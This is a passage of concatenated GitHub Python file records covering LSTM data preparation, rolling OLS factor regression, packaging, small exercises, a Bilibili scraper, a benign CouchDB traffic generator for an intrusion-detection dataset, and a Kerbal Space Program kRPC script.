.drop(\n columns = [\n 'DLY_AWD_QTY',\n 'TYPE', \n 'DLY_PRICE', \n 'DLY_AWD_PRICE'\n ]\n )\n )\n # Resampling\n off = off.set_index(pd.DatetimeIndex(off.index))\n off = off.resample('D').sum()\n # Get OFF(t) as feature\n label = np.roll(off['DLY_QTY'], -1, axis=0)\n # Discard the first values\n off = off[:-1]\n label = label[:-1]\n \n # Read MGP\n mgp = (\n pd\n .read_csv('../data/mgp.csv', index_col='Timestamp')\n .iloc[1:]\n )\n mgp = mgp.set_index(pd.DatetimeIndex(mgp.index))\n mgp = mgp.resample('D').mean()\n mgp = mgp.iloc[:-(TIMESTEPS)]\n\n # Merge dataframes\n merged = pd.merge(\n mgp, \n off, \n left_index=True, \n right_index=True\n )\n \n return merged[self.selectFeatures(merged, label)], label\n \n def selectFeatures(self, dataframe, target):\n \"\"\"Select the features of interest according to \n the wanted minimum correlation among them.\n \n Parameters\n ----------\n dataframe : pandas.DataFrame\n Data\n target : numpy.ndarray\n The target variables\n \n Returns\n -------\n List\n The list of selected features\n \"\"\"\n dataset = dataframe.copy()\n cols=[x for x in dataframe.head()]\n dataset['Target'] = target\n\n corr = dataset.corr()\n corr = corr.drop(columns=cols).dropna()\n corr = corr.where(abs(corr['Target'])>self.corr_limit).dropna()\n features = [x for x in corr.index if x != 'Target']\n \n return features\n \n def reshapeData(self, data):\n \"\"\"Reshape a 2-d Dataframe to 3-d.\n \n Parameters\n ----------\n data : pandas.DataFrame\n 2-d Data\n \n Returns\n -------\n pandas.DataFrame\n 3-d Data\n \"\"\"\n data1 = np.zeros(shape=(data.shape[0],1,data.shape[1]), dtype=float)\n data1[:,0,:] = data\n data2 = np.zeros(shape=(data.shape[0],TIMESTEPS,data.shape[1]), dtype=float)\n for i in range(data.shape[0]-TIMESTEPS+1):\n for j in np.arange(0,TIMESTEPS):\n data2[i,j] = data1[j+i]\n return data2\n \n def descaleData(self, y_hat):\n \"\"\"Descale the data from [0, 1] to original.\n \n Parameters\n ----------\n y_hat : numpy.ndarray\n Array to be descaled\n \n Returns\n -------\n numpy.ndarray\n Descaled array\n \"\"\"\n with open('../models/lstmScalery.pkl', 'rb') as file:\n scaler_y = pickle.load(file)\n\n y_hat_r = y_hat.reshape(y_hat.shape[0],y_hat.shape[1])\n y_hat_d = scaler_y.inverse_transform(y_hat_r)\n\n return y_hat_d\n \n def scaleData(self, X_toScale, *y):\n \"\"\"Scale the data to [0, 1] range.\n \n Parameters\n ----------\n X_toScale : numpy.ndarray\n Data to be scaled\n \n Returns\n -------\n numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray\n Scaled arrays of train and test set\n \"\"\"\n if len(y)>0:\n y = y[0]\n\n # Initialize the training and test items\n x_test = X_toScale[int(X_toScale.shape[0]*SPLIT):,:,:]\n x_train = X_toScale[:int(X_toScale.shape[0]*SPLIT),:,:]\n \n x_train_s = np.zeros((x_train.shape[0],x_train.shape[1],x_train.shape[2]))\n x_test_s = np.zeros((x_test.shape[0],x_test.shape[1],x_test.shape[2]))\n \n # Scale each feature of X\n for i in range(X_toScale.shape[1]):\n scaler_x = MinMaxScaler(feature_range=(0, 1))\n scaler_y = MinMaxScaler(feature_range=(0, 1))\n\n scaler_x.fit(x_train[:,i,:])\n\n x_train_s[:,i,:] = scaler_x.transform(x_train[:,i,:])\n x_test_s[:,i,:] = scaler_x.transform(x_test[:,i,:])\n # Save the scalers\n with open(f'../models/lstmScaler{i}x.pkl', 'wb') as file:\n pickle.dump(scaler_x, file)\n\n \n y_test = y[int(y.shape[0]*SPLIT):,:]\n y_train = y[:int(y.shape[0]*SPLIT),:]\n \n # Scale each feature of y\n scaler_y.fit(y_train)\n\n y_train_s = np.zeros((y_train.shape))\n y_test_s = 
np.zeros((y_test.shape))\n\n        y_train_s = scaler_y.transform(y_train)\n        y_test_s = scaler_y.transform(y_test)\n\n        y_test_s = y_test_s.reshape(y_test_s.shape[0],y_test_s.shape[1],1)\n        y_train_s = y_train_s.reshape(y_train_s.shape[0],y_train_s.shape[1],1)\n        # Save the scaler\n        with open('../models/lstmScalery.pkl', 'wb') as file:\n            pickle.dump(scaler_y, file)\n\n\n        return x_train_s, y_train_s, x_test_s, y_test_s\n\n        else:\n            # Load the scalers and scale the provided dataset\n            x_scaled = np.zeros((X_toScale.shape[0],X_toScale.shape[1],X_toScale.shape[2]))\n            for i in range(X_toScale.shape[1]):\n                with open(f'../models/lstmScaler{i}x.pkl', 'rb') as file:\n                    scaler_x = pickle.load(file)\n                x_scaled[:,i,:] = scaler_x.transform(X_toScale[:,i,:])\n\n            return x_scaled\n\nclass Correlation():\n    \"\"\"Class to perform correlation analysis for the LSTM model.\n    \n    Parameters\n    ----------\n    corr_limit : Float\n        Minimum level of correlation among features\n    \n    Attributes\n    -------\n    corr_limit : Float\n        Minimum level of correlation among features\n    \n    Methods\n    -------\n    loadData()\n        Data loader\n    selectFeatures(dataframe, target)\n        Selector of the features according to their correlation\n    \"\"\"\n    def __init__(self, corr_limit):\n        self.corr_limit = corr_limit\n\n    def loadData(self):\n        \"\"\"Load the data from a .csv file and put them\n        into a Pandas Dataframe.\n        \n        Returns\n        -------\n        pandas.DataFrame, numpy.ndarray\n            Dataframe containing the data and the relative array of labels\n        \"\"\"\n        # Read Offerte Pubbliche \n        off = (\n            pd\n            .read_csv('../data/bid.csv', index_col='Unnamed: 0')\n            .drop(\n                columns = [\n                    'DLY_AWD_QTY',\n                    'TYPE', \n                    'DLY_PRICE', \n                    'DLY_AWD_PRICE'\n                ]\n            )\n        )\n        # Resampling\n        off = off.set_index(pd.DatetimeIndex(off.index))\n        off = off.resample('D').mean()\n        # Get OFF(t) as feature\n        label = np.roll(off['DLY_QTY'], -1, axis=0)\n        # Discard the first values\n        off = off[:-1]\n        label = label[:-1]\n        \n        # Read MGP\n        mgp = (\n            pd\n            .read_csv('../data/mgp.csv', index_col='Timestamp')\n            .iloc[1:]\n        )\n        mgp = mgp.set_index(pd.DatetimeIndex(mgp.index))\n        mgp = mgp.resample('D').mean()\n        mgp = mgp.iloc[:-(TIMESTEPS)]\n\n        # Merge dataframes\n        merged = pd.merge(\n            mgp, \n            off, \n            left_index=True, \n            right_index=True\n        )\n        \n        return merged, label\n    \n    def selectFeatures(self, dataframe, target):\n        \"\"\"Select the features of interest according to \n        the wanted minimum correlation among them.\n        \n        Parameters\n        ----------\n        dataframe : pandas.DataFrame\n            Data\n        target : numpy.ndarray\n            The target variables\n        \n        Returns\n        -------\n        pandas.DataFrame\n            Dataframe of the selected features\n        \"\"\"\n        dataset = dataframe.copy()\n        cols=[x for x in dataframe.head()]\n        dataset['Target'] = target\n\n        corr = dataset.corr()\n        corr = corr.drop(columns=cols).dropna()\n        corr = corr.where(abs(corr['Target'])>self.corr_limit).dropna()\n        features = [x for x in corr.index if x != 'Target']\n        \n        \n        return corr","repo_name":"lucagioacchini/electricity-market-maximizer","sub_path":"analysis/src/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":9770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"73194559892","text":"# This file contains the regression functions used in the dissertation.\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.regression.linear_model as lm\nimport os\nimport sys\nfrom IPython import get_ipython\n\n
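# Typical call flow for this module (a sketch; X, stocks and betas stand in for\n# the caller's data and are shown here only as placeholders):\n#\n#     betas = {'reg1': ['feat_a'], 'reg2': ['feat_a', 'feat_b']}\n#     OLS.SAVE_ALL_ITEMS_IN_OLS(X, stocks, betas, freq='D')\n#     factors = search('f', 'D')\n#     expected = search('e', 'D')\n\n# Check whether the current interpreter is IPython\nif 'ipykernel' in sys.modules:\n    # If running in a 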
notebook, importiamo IPython.display.clear_output\n from IPython.display import clear_output\nelse:\n # Se siamo in un programma, importiamo os.system('cls')\n def clear_output():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef search(ret, freq):\n ret_dict = {\n 'f': ['fac', 'factors'],\n 'e': ['exp', 'expected']\n }\n path = f'{os.getcwd()}//Regression//{freq}//{ret_dict[ret][0]}//{ret_dict[ret][1]}.parquet'\n df = pd.read_parquet(path)\n return df\n\n\nclass OLS:\n # @staticmethod\n # def create_df_factors(index, betas):\n # # Creazione delle tuple per le colonne del dataframe\n # tuples_columns = [(reg, beta) for reg in betas.keys() for beta in betas[reg]]\n # # Creazione del dataframe vuoto\n # df = pd.DataFrame(np.nan, index=index, columns=pd.MultiIndex.from_tuples(tuples_columns))\n # return df\n\n @staticmethod\n def create_df_factors(index, betas):\n \"\"\"\n Funzione che crea un dataframe vuoto con colonne\n date dal dict betas.\n \"\"\"\n tuples_columns = [(reg, beta) for reg in betas.keys() for beta in betas[reg]]\n df = pd.DataFrame(np.nan, index=index, columns=pd.MultiIndex.from_tuples(tuples_columns))\n return df\n \n @staticmethod\n def preprocess_data(X, Y, freq):\n \"\"\"\n Funzione che fa la resampling dei dati non giornalieri e\n restituisce i dati dopo lo shift.\n \"\"\"\n from Methods import resample_returns\n if freq != 'D':\n X = resample_returns(X, freq)\n Y = resample_returns(Y, freq)\n X = X.shift().dropna()\n return X, Y\n\n @staticmethod\n def filter_valid_indices(X, Y):\n \"\"\"\n Funzione che filtra gli indici di Y che non sono presenti in X.\n \"\"\"\n from Methods import intersection, add_year\n # Salviamo l'indice\n stk = Y.name\n save_index = intersection(X.index, Y.index)\n ols_index = intersection(X.index, Y.dropna().index)\n \n # Ora impostiamo i dati\n X = X.loc[ols_index]\n Y = Y.loc[ols_index]\n starting_valid_obs = add_year(ols_index[0])\n \n # Reimpostiamo l'indice:\n ols_index = X.loc[starting_valid_obs: , :].index\n \n return save_index, ols_index, X, Y, stk\n\n @staticmethod\n def print_debug_info(stk, regression_name, date, betas):\n clear_output()\n div = 50*'-'\n print(div, \n stk, \n regression_name, \n date, \n div, \n sep = '\\n')\n\n @staticmethod\n def run_ols(X, Y, betas, date, regression_name, pause):\n \"\"\"\n Funzione che esegue la regressione OLS e restituisce il risultato.\n \"\"\"\n capm = lm.OLS(\n Y.loc[:date].iloc[:-1], \n X.loc[:date, betas[regression_name]].iloc[:-1], \n hasconst=True).fit()\n if pause:\n div = 50*'-'\n print(div, \n 'date saved on factors: ', date,\n 'y.loc[:i].index (start-end):', Y.loc[:date].iloc[:-1], \n 'x.loc[:i].index (start-end) lembrando que x = x.shift().dropna()[:last_date_to_try]:', X.loc[:date, betas[regression_name]].iloc[:-1], \n sep = '\\n')\n input('Pressione uma tecla para a próxima acao: ')\n return list(capm.params)\n\n @staticmethod\n def ols(X, Y, betas: dict, freq='D', pause=False):\n \"\"\"\n Funzione che esegue la regressione OLS su Y rispetto ad X\n in base ai beta passati come dict.\n \"\"\"\n # Attention to avoid circular imports\n \n # Preprocessing dei dati\n X, Y = OLS.preprocess_data(X, Y, freq)\n\n # Filtraggio degli indici validi\n save_index, ols_index, X, Y, stk = OLS.filter_valid_indices(X, Y)\n \n # Inizializzazione del dataframe dei fattori\n factors = OLS.create_df_factors(ols_index, betas)\n\n for date in ols_index:\n clear_output()\n div = 50*'-'\n print(div, \n stk, \n date, \n div, \n sep = '\\n')\n \n for regression_name in list(betas.keys()):\n # 
Debug INFO\n # OLS.print_debug_info(stk, regression_name, date, betas)\n \n # Esecuzione della regressione OLS\n capm_params = OLS.run_ols(X, Y, betas, date, regression_name, pause)\n\n # Aggiornamento del dataframe dei fattori\n factors.loc[date, (regression_name, betas[regression_name])] = capm_params\n \n # print('factors', factors.loc[date, (regression_name, betas[regression_name])])\n # print('capm', capm_params)\n # input('olhe')\n\n # Restituzione del dataframe dei fattori\n # return factors.iloc\n path = f'{os.getcwd()}//Regression//{freq}//fac//Stocks//{stk}.csv'\n factors.to_csv(path)\n \n @staticmethod\n def start_regression(X: pd.DataFrame, stocks: pd.DataFrame, betas: dict, freq: str):\n # Esegue la regressione lineare per ogni azione\n for stock in stocks.columns:\n OLS.ols(X, stocks[stock], betas, freq = freq)\n \n @staticmethod\n def merge_factors(freq):\n # Ottiene il percorso della directory contenente i dati sui fattori di frequenza specificata\n path = f'{os.getcwd()}//Regression//{freq}//fac//Stocks//'\n # Ottiene il percorso della directory padre dei dati sui fattori di frequenza specificata\n parent_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n \n # Ottiene i nomi dei file dei fattori di ogni azione nella directory dei dati sui fattori di frequenza specificata\n factors_of_stocks = [\n filename[:-4] for filename in os.listdir(path)\n ]\n \n # Ottiene i dati sui fattori per ogni azione e li inserisce in una lista\n list_of_factors_by_stock = [\n pd.read_csv(path + filename + '.csv', index_col = [0], header = [0,1])\n for filename in factors_of_stocks\n ]\n \n # Concatena tutti i dati sui fattori in un unico DataFrame\n df = pd.concat(list_of_factors_by_stock, axis = 1, keys = factors_of_stocks)\n \n return df\n \n @staticmethod\n def save_factors(df, freq):\n # Ottiene il percorso della directory contenente i dati sui fattori di frequenza specificata\n dac_path = f'{os.getcwd()}//Regression//{freq}//fac//'\n \n # Salva il DataFrame dei fattori in formato Parquet nella directory dei dati sui fattori di frequenza specificata\n df.to_parquet(f'{dac_path}factors.parquet')\n \n def save_expected(factors, indices, freq):\n # Copia gli indici e i fattori e modifica il formato degli indici in formato datetime\n indices, factors = indices.copy(), factors.copy()\n indices.index, factors.index = pd.to_datetime(indices.index), pd.to_datetime(factors.index)\n \n # Resample i ritorni:\n if freq != 'D':\n from Methods import resample_returns\n indices = resample_returns(indices, freq)\n # Sposta gli indici di un giorno in avanti e seleziona solo gli indici corrispondenti ai dati sui fattori\n indices = indices.shift().loc[factors.index]\n factors = factors.loc[indices.index]\n \n # Imposta l'indice dei fattori come l'indice degli indici\n factors.index = indices.index\n \n # Moltiplica ogni valore dei fattori per il valore corrispondente degli indici\n df = factors.multiply(indices, level = 2)\n \n # Somma i valori dei fattori per ogni coppia di (data, azione) e salva il risultato in un DataFrame\n df_sum = df.groupby(level = [0,1], axis = 1).sum()\n \n # Salva il DataFrame dei fattori attesi in formato Parquet nella directory dei dati sui fattori di frequenza specificata\n exp_path = f'{os.getcwd()}//Regression//{freq}//exp//'\n df_sum.to_parquet(f'{exp_path}expected.parquet')\n \n @staticmethod\n def SAVE_ALL_ITEMS_IN_OLS(X, Y, betas, freq):\n # First, we calculate and separate each factor from each stock separatedly:\n OLS.start_regression(X, Y, betas, freq = freq)\n # 
Then we merge all of them into a single file:\n        OLS.save_factors(\n            OLS.merge_factors(freq),\n            freq\n        )\n        # Now we calculate expected values of stocks:\n        OLS.save_expected(\n            search('f', freq),\n            X,\n            freq)\n\n\n    @staticmethod\n    def DEBUG_OLS_INFO():\n        # Print a debug prompt before the regression\n        div = 80*'-'\n        print(\n            div,\n            'The regression is about to start. Continue? [S/n]: ',\n            div, sep = '\\n')\n        return input('Answer: ')\n\n    @staticmethod\n    def DEBUG_FIX_FACTORS_AND_EXPECTED():\n        # Print a debug prompt before rebuilding the factors and expected values\n        div = 80*'-'\n        print(\n            div,\n            'The program is about to rebuild the factors and expected values. Continue? [S/n]: ',\n            div, sep = '\\n')\n        return input('Answer: ')\n\n\n    # def show_expected(factors, indices):\n    #     indices = indices.shift().loc[factors.index]\n    #     factors = factors.loc[indices.index]\n    #     factors.index = indices.index\n    #     df = pd.DataFrame(np.nan, index = indices.index, columns = factors.columns)\n    #     for column in factors.columns:\n    #         if column[2] in indices.columns:\n    #             clear_output()\n    #             print(80*'-')\n    #             print(column)\n    #             print(80*'-')\n    #             df.loc[:, column] = factors[column].multiply(indices[column[2]])\n    #     return df
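\n\n# A minimal usage sketch (hypothetical names: X holds the factor returns, stocks holds one\n# column of returns per ticker, and betas maps a regression label to its factor columns):\n#\n#     betas = {'capm': ['MKT'], 'ff3': ['MKT', 'SMB', 'HML']}\n#     OLS.SAVE_ALL_ITEMS_IN_OLS(X, stocks, betas, freq='D')\n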
","repo_name":"lvoltolini/Finance_file","sub_path":"Methods/OLS.py","file_name":"OLS.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31197357320","text":"\"\"\"setup.py\n\nUsed for packaging wrappeddriver\n\"\"\"\nfrom pathlib import Path\nfrom setuptools import find_packages, setup\n\nAUTHOR = \"Brian Alexander\"\nAUTHOR_EMAIL = \"brian@dadgumsalsa.com\"\nREPO_URL = \"https://github.com/balexander85/wrappeddriver\"\nVERSION = \"0.2.6\"\nDESCRIPTION = \"A simple wrapper for selenium webdriver.\"\n\nwith Path(__file__).parent.joinpath(\"README.md\").open(encoding=\"UTF-8\") as readme:\n    README = readme.read()\n\nsetup(\n    name=\"wrappeddriver\",\n    version=VERSION,\n    packages=find_packages(),\n    install_requires=[\"selenium>=4.1.0\"],\n    python_requires=\">=3.8.0\",\n    include_package_data=False,\n    license=\"MIT License\",\n    description=DESCRIPTION,\n    long_description=README,\n    url=REPO_URL,\n    author=AUTHOR,\n    author_email=AUTHOR_EMAIL,\n    classifiers=[\n        \"Environment :: Web Environment\",\n        \"Framework :: Selenium\",\n        \"Framework :: Selenium :: 4.1\",\n        \"Intended Audience :: Developers\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n        \"Programming Language :: Python\",\n        \"Programming Language :: Python :: 3.10\",\n    ],\n)\n","repo_name":"balexander85/wrappeddriver","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3664139393","text":"stock = [400, 540, 120, 9, 550] # water, milk, beans, cups and cash\n\ndef print_status(stock):\n    status = '''\nThe coffee machine has:\n{} of water\n{} of milk\n{} of coffee beans\n{} of disposable cups\n${} of money'''.format(stock[0], stock[1], stock[2], stock[3], stock[4])\n    print(status)\n\n\ndef take_action():\n    action = input(\"\\nWrite action (buy, fill, take, remaining, exit):\\n\")\n    if action == 'buy':\n        buy()\n    elif action == 'fill':\n        fill()\n    elif action == 'take':\n        take()\n    elif action == 'remaining':\n        remaining()\n    else:\n        leave()\n\n\ndef buy():\n    global stock\n    cust_order = input('\\nWhat do you want to buy? 
1 - espresso, 2 - latte, 3 - cappucino, back - to main menu:\\n')\n while cust_order == '1':\n if stock[0] >= 250:\n stock[0] -= 250\n else:\n print('Sorry, not enough water!')\n break\n if stock[2] >= 16:\n stock[2] -= 16\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 4\n print('I have enough resources, making you a coffee!')\n break\n while cust_order == '2':\n if stock[0] >= 350:\n stock[0] -= 350\n else:\n print('Sorry, not enough water!')\n break\n if stock[1] >= 75:\n stock[1] -= 75\n else:\n print('Sorry, not enough milk!')\n break\n if stock[2] >= 20:\n stock[2] -= 20\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 7\n print('I have enough resources, making you a coffee!')\n break\n while cust_order == '3':\n if stock[0] >= 200:\n stock[0] -= 200\n else:\n print('Sorry, not enough water!')\n break\n if stock[1] >= 100:\n stock[1] -= 100\n else:\n print('Sorry, not enough milk!')\n break\n if stock[2] >= 12:\n stock[2] -= 12\n else:\n print('Sorry, not enough coffee beans!')\n break\n if stock[3] >= 1:\n stock[3] -= 1\n else:\n print('Sorry, not enough disposable cups!')\n break\n stock[4] += 6\n print('I have enough resources, making you a coffee!')\n break\n else:\n take_action()\n\n\ndef fill():\n global stock\n stock[0] += int(input('Write how many ml of water do you want to add:\\n'))\n stock[1] += int(input('Write how many ml of milk do you want to add:\\n'))\n stock[2] += int(input('Write how many grams of coffee beans do you want to add:\\n'))\n stock[3] += int(input('Write how many disposable cups of coffee do you want to add:\\n'))\n\n\ndef take():\n global stock\n print(f'\\nI gave you ${stock[4]}')\n stock[4] = 0\n\n\ndef remaining():\n print_status(stock)\n\n\ndef leave():\n global x\n x = 1\n\n\nx = 0\nwhile x == 0:\n take_action()\n","repo_name":"rclites/jetbrains","sub_path":"coffee_machine.py","file_name":"coffee_machine.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12170511330","text":"from PIL import ImageSequence\nfrom PIL import Image as PImage\nfrom .app import renderer\nfrom .core import Color\nfrom .core import Image\nfrom .common import get_bounding_rect_by_mode\nfrom .common import add_on_return\nfrom .common import color_check\nfrom .common import params_check\n\n\n#### Loading & Displaying\n\nclass CImage(object):\n\n def __init__(self, width=10, height=10, data=None):\n self._pixels = data if data else [[0, 0, 0, 1]] * width * height\n self.pixels = []\n self.width = width\n self.height = height\n\n def load_pixels(self):\n self.pixels = [p for p in self._pixels]\n\n def update_pixels(self):\n self._pixels = [p for p in self.pixels]\n\n def set(self, x, y, color):\n index = x + y * self.width\n self.pixels[index] = color\n\n def get(self, x, y):\n index = x + y * self.width\n return self.pixels[index]\n\n def __getitem__(self, index):\n return self._pixels[index]\n\n def __setitem__(self, key, value):\n self._pixels[key] = value\n\n def __repr__(self):\n attrs = {\n 'pixels': self._pixels,\n 'width': self.width,\n 'height': self.height\n }\n return attrs.__repr__()\n\n __str__ = __repr__\n\n\n@params_check(\n CImage,\n (int, float),\n (int, float),\n (int, float),\n (int, float)\n)\n@add_on_return\ndef 
image(img, a, b, c, d):\n x1, y1, x2, y2, _, y3, _, _ = get_bounding_rect_by_mode(\n a, b, c, d, renderer.image_mode)\n\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n y3 = int(y3)\n w = x2 - x1 + 1\n h = y3 - y2 + 1\n\n return Image(img, x1, y1, w, h)\n\n\n@params_check(int)\ndef image_mode(mode):\n renderer.image_mode = mode\n\n\ndef no_tint():\n renderer.is_tint_enabled = False\n\n\n@color_check\ndef tint(ch=\" \", fg=None, bg=None):\n renderer.is_tint_enabled = True\n c = Color(ch, fg, bg)\n renderer.tint_color = c\n\n\n@params_check(str)\ndef load_image(src):\n image = PImage.open(src)\n images = []\n for frame in ImageSequence.Iterator(image):\n rgb_frame = frame.convert('RGBA')\n w, h = rgb_frame.size\n data = rgb_frame.getdata()\n images.append(CImage(w, h, data))\n return images[0] if len(images) == 1 else images\n","repo_name":"charming-art/charming","sub_path":"src/charming/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"24077879579","text":"# cook your dish here\r\nimport re\r\n\r\nnumberOfCasesRaw = input()\r\nnumberOfCases = int(re.sub(\"\\D\",\"\",numberOfCasesRaw))\r\ndigits = []\r\nmainArr = []\r\ncounter = 0\r\ns =[]\r\n\r\ndef convert(s):\r\n new = \"\"\r\n for x in s:\r\n new += x\r\n return new\r\n\r\n\r\nwhile counter < numberOfCases:\r\n inputNumber = str(input())\r\n digits = [str(i) for i in str(inputNumber)]\r\n\r\n\r\n#print(digits)\r\n\r\n\r\n s = digits.copy()\r\n size = len(digits)\r\n for i in range(0,size):\r\n digits.pop(i)\r\n mainArr.append(int(convert(digits)))\r\n digits.insert(i, s[i])\r\n\r\n print(min(mainArr))\r\n counter += 1\r\n mainArr= []","repo_name":"kalilinukx/python_porjects","sub_path":"hello_world/code_chef_first_problem.py","file_name":"code_chef_first_problem.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34477495038","text":"import scrapy\nfrom ..models.db import Bilibili\n\n\nclass QuotesSpider(scrapy.Spider):\n name = \"bilibili\"\n urls = []\n\n def start_requests(self):\n for i in range(1, 2000000):\n self.urls.append('https://www.bilibili.com/video/av' + str(i))\n for url in self.urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n name = response.xpath('//h1/text()').extract_first()\n if name is not None:\n print(name)\n Bilibili.insert(name=name).execute()\n","repo_name":"zw8677174/spiders","sub_path":"tutorial/tutorial/spiders/bilibili_spider.py","file_name":"bilibili_spider.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"39913277505","text":"import heapq\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nq = []\n\n\ndef abs_heap(q, x):\n if x:\n heapq.heappush(q, (abs(x), x // abs(x)))\n else:\n if q:\n val, ab = heapq.heappop(q)\n print(val * ab)\n else:\n print(0)\n\nfor _ in range(n):\n abs_heap(q, int(input()))\n","repo_name":"ozll2b/python_study","sub_path":"class3/BOJ11286.py","file_name":"BOJ11286.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6978617587","text":"import random\nimport sys\nimport numpy\nimport couchdb_min\nfrom faker import Faker\n\n\ndef _update_doc_data(doc):\n return {\n **doc,\n 'name': 
faker.company(),\n        'phrase': faker.catch_phrase(),\n        'address': {\n            'country': faker.country(),\n            'city': faker.city(),\n            'postcode': faker.postcode(),\n            'street': faker.street_address(),\n        }\n    }\n\n\ndef connect(admin=False):\n    account = random.choice(admins if admin else user)\n    return couchdb_min.Server(host, account[0], account[1])\n\n\ndef query(db=None):\n    if not db:\n        db = random.choice(list(dbs.keys()))\n    dbs[db] = connect().get(db).all_ids()\n    print(\"GOT %s from database %s\" % (len(dbs[db]), db))\n\n\ndef update_document():\n    db = random.choice(list(dbs.keys()))\n    if len(dbs[db]) == 0:\n        query(db)\n    conn = connect().get(db)\n    doc = conn.get(random.choice(dbs[db]))\n    updated_doc = conn.save(_update_doc_data(doc))\n    print(\"Update of doc %s in database %s\" % (updated_doc, db))\n\n\ndef delete_document():\n    db = random.choice(list(dbs.keys()))\n    if len(dbs[db]) == 0:\n        query(db)\n    conn = connect().get(db)\n    doc_id = random.choice(dbs[db])\n    conn.delete(doc_id)\n    dbs[db].remove(doc_id)\n\n    print(\"Deleted doc %s in database %s\" % (doc_id, db))\n\n\ndef new_document():\n    db = random.choice(list(dbs.keys()))\n    conn = connect().get(db)\n    inserted_doc = conn.save(_update_doc_data({}))\n    dbs[db].append(inserted_doc['_id'])\n    print(\"Inserted %s into %s\" % (inserted_doc, db))\n\n\ndef wrong_login():\n    couchdb_min.Server(host, faker.first_name(), faker.password(8)).info()\n    print(\"Executed wrong login\")\n\n\nif __name__ == '__main__':\n    faker = Faker()\n\n    host = sys.argv[1]\n\n    admins = [('admin', 'admin')]\n    user = [('dbreader', 'dbreader'), ('guest', 'dbpass')]\n    dbs = {\"projects\": []}\n\n    while True:\n        sys.stdin.readline()\n        # for distribution check /_stats\n        try:\n            mapping = {\n                'wrong': wrong_login,\n                'query': query,\n                'delete': delete_document,\n                'update': update_document,\n                'new': new_document,\n            }\n            choice = numpy.random.choice(list(mapping.keys()),\n                                         p=[0.1, 0.4, 0.15, 0.15, 0.2])\n            mapping[choice]()\n        except Exception as e:\n            print(\"Exception\", e)\n","repo_name":"LID-DS/LID-DS","sub_path":"scenarios/CVE-2017-12635_6/normal/normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"67"} +{"seq_id":"47227320247","text":"import krpc\r\nimport time\r\nimport os\r\n\r\n# clear the console\r\nclear = lambda: os.system('cls')\r\nclear()\r\n\r\ndef pause_until_end_of_liquid_fuel(conn):\r\n    print(\"waiting until liquid fuel ends\")\r\n\r\n    vessel = conn.space_center.active_vessel\r\n    fuel_amount = conn.get_call(vessel.resources.amount, 'LiquidFuel')\r\n    expr = conn.krpc.Expression.less_than(\r\n        conn.krpc.Expression.call(fuel_amount),\r\n        conn.krpc.Expression.constant_float(0.1))\r\n    event = conn.krpc.add_event(expr)\r\n    with event.condition:\r\n        event.wait()\r\n\r\ndef pause_until_end_of_solid_fuel(conn):\r\n    print(\"waiting until solid fuel ends\")\r\n    vessel = conn.space_center.active_vessel\r\n    fuel_amount = conn.get_call(vessel.resources.amount, 'SolidFuel')\r\n    expr = conn.krpc.Expression.less_than(\r\n        conn.krpc.Expression.call(fuel_amount),\r\n        conn.krpc.Expression.constant_float(0.1))\r\n    event = conn.krpc.add_event(expr)\r\n    with event.condition:\r\n        event.wait()\r\n\r\n\r\ndef second_stage(conn):\r\n    vessel = conn.space_center.active_vessel\r\n\r\n    # lock the direction sideways (60-degree pitch)\r\n    vessel.auto_pilot.target_pitch_and_heading(60, 90)\r\n\r\n    # activate the stage\r\n    vessel.control.activate_next_stage()\r\n\r\n    # wait until the fuel runs out\r\n    
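# (this blocks on a server-side kRPC event instead of polling; see pause_until_end_of_liquid_fuel above)\r\n    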
